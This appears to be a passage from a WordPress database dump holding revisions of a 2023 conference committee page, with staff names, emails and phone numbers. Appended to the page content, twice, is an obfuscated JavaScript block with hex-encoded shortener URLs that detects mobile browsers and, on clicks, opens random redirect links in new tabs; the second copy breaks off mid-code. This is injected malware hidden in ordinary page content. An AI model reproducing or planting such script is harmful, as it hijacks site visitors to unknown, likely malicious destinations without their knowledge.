Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:34:32','2023-06-27 10:34:32','',4849,'https://gsw2023.com/?p=4905',0,'revision','',0),
(4906,4,'2023-06-27 10:36:15','2023-06-27 10:36:15','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687862064787{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\"][vc_column_text css=\".vc_custom_1687862167348{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 